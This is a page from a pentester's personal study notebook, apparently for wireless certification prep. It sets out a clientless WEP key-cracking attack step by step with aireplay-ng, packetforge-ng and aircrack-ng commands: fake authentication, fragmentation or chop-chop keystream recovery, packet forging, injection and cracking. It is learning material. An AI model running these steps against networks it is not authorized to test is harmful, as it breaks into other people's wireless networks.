refabr1k's Pentest Notebook
  • refabr1k's Pentest Notebook
  • Steganography
  • Kali USB with persistence memory
  • useful tools
  • Understanding ICACLS permissions
  • INFO GATHERING
    • Port Knocking
    • 22 tcp - SSH
      • SSH Tunneling
    • 25 tcp - SMTP
    • 53 tcp/udp - DNS
    • 88 tcp - Kerberos
    • 161 udp - SNMP
    • 445 tcp - SMB
    • 1098,1099 tcp - Java RMI
    • 8009 tcp - AJP
    • 5901,5902 tcp - VNC
  • Web
    • XSS cookie stealing
    • PHP
    • Webdav
    • Wordpress
    • XML RPC
    • SQL Injection
    • SSRF
  • EXPLOITATION
    • File Transfers
    • Buffer Overflow
    • Bruteforce
      • Hashcat
      • Ophcrack (rainbow tables)
      • John The Ripper
    • PHP rce
    • Compiling
    • msfvenom
    • Reverse shell
    • Using ENV to escape Bad Characters
    • shellshock
    • Ncat Persistent Backdoor
  • PRIVESC - LINUX
    • Basic checks
    • Upgrading Shells
    • SUID
  • Privesc - Windows
    • Basic checks / powershell
    • Privesc Openings
    • LonelyPotato - SeImpersonatePrivilege
    • Enable RDP @ Firewall
    • NTLM (Pass The Hash)
  • Windows
    • NTDS.dit
    • Responder / SMB Relay
    • Attacking AD
      • AD Hacking Lab Setup
  • Metasploit
    • Basic Usage
    • Meterpreter
      • Pivoting
      • Windows Post Exploitation
  • Unsorted
    • other notes
  • eLearnSecurity eJPT
    • eJPT notes
  • OSWP
  • Getting started
  • WEP Attacks
    • WEP Attack (OPEN) - Clients connected
    • WEP Attack (OPEN) - Clientless
    • WEP Attack (SKA)
  • WPA/WPA2 Attacks
  • Scripts
    • get port from nmap
    • Curl response
    • ping sweep
    • iptables-counter.sh
    • (DNS) zonetransfer_check.sh
    • (DNS) dns-rev-brute.sh
    • (DNS) dns-fwd-brute.sh
    • (SMB) vuln-scan.sh
    • (SMB) samba-checker.sh
    • (SMTP) vrfy.py
    • (SNMP) mib-check.sh
  • Zeroday vulnerabilities explained
    • 2020-12 Solarwind supply chain
Powered by GitBook
On this page
  • 1. Fake authentication attack (MAC association)
  • 2. Fragmentation attack / Korek Chop Chop
  • (i) Fragmentation
  • (ii) Korek Chop Chop
  • 3. Packetforge-ng create Injection packets
  • 4. Inject Packets to network (aireplay Interactive mode)
  • 5. Cracking WEP password

Was this helpful?

  1. WEP Attacks

WEP Attack (OPEN) - Clientless

This attack uses packetforge-ng to "forge" a packet that can be used to replay against AP collecting enough IV to crack the password.

PreviousWEP Attack (OPEN) - Clients connectedNextWEP Attack (SKA)

Last updated 4 years ago

Was this helpful?

1. Fake authentication attack (MAC association)

Similarly to scenario of WEP attack with Clients connected. Perform a Fake authentication attack to associate with AP (refer to the 1st step of WEP attack guide link below)

2. Fragmentation attack / Korek Chop Chop

Both methods can lead us subsequently create the ARP injection packet that we can later use in replaying the request to AP (to gather enough IV which in turn can let us crack the WEP)

(i) Fragmentation

fragmentation attack does not obtain WEP key, but obtains PRGA key stream of packets - PRGA can be used to generate packets with packetforge-ng. Generate packets for injection attacks.

aireplay-ng -5 -b <AP_MAC> -h <MY_MAC> wlan0mon

# Reports "Got RELAYED packet!!"
# Saving keystream in a file name <fragment-xxxx-xxx.xor>

(ii) Korek Chop Chop

Korek chop chop attack can decrypt WEP packet without knowing the key. Recovery of key stream for a given packet, to allow us to decrypt previous or future packets with equal or less length of same IV. This allow us to generate our own new packets for injection without the WEP key.

We can also use korek chop chop for various things:

  • decrypt interesting packets

  • forge snmp packets

  • blind port scan of the network

  • create arp request to accelerate IV

To perform Korek Chop chop attack use the below command. Once receive a packet enter 'y'

aireplay-ng -4 -b <AP_MAC> -h <MY_MAC> wlan0mon
# packet filename - "replay_xxx-xxxx-xxxxxx.cap"
# PRGA filename - "replay_xxx-xxxx-xxxxxx.xor"

# Examine captured packet
tcpdump -s 0 -n -e -r replay_xxx-xxx-xxxxx.cap

#TAKE NOTE OF THE IP ADDRESS

Now check the contents of the captured packet to discover what is the IP scheme of the network

tcpdump -s 0 -n -e -r <replay_xxx-xxxx-xxxxxx.cap>
# eg. broadcast packet details show that client ip details

3. Packetforge-ng create Injection packets

Creates encrypted packets which later be used for injection. PRGA we got previously is used to encrypt packets by packetforge-ng. 

packetforge-ng -0 -a <AP_MAC> -h <MY_MAC> -l <soure_address> -k <destination address> -y <prga file> -w <inject.cap>

# Examine if the created packet makes sense (or is a valid one)
tcpdump -n -vvv -e -s0 -r inject.cap

4. Inject Packets to network (aireplay Interactive mode)

Select 'y' to send packet to AP. Now the 'data' count is rapidly increasing, this attack continues in WEP attack where client is connected scenario.

aireplay-ng -2 -r <inject.cap> wlan0mon

5. Cracking WEP password

aircrack-ng -0 <airodump-writeout-file.cap>

WEP Attack (OPEN) - Clients connected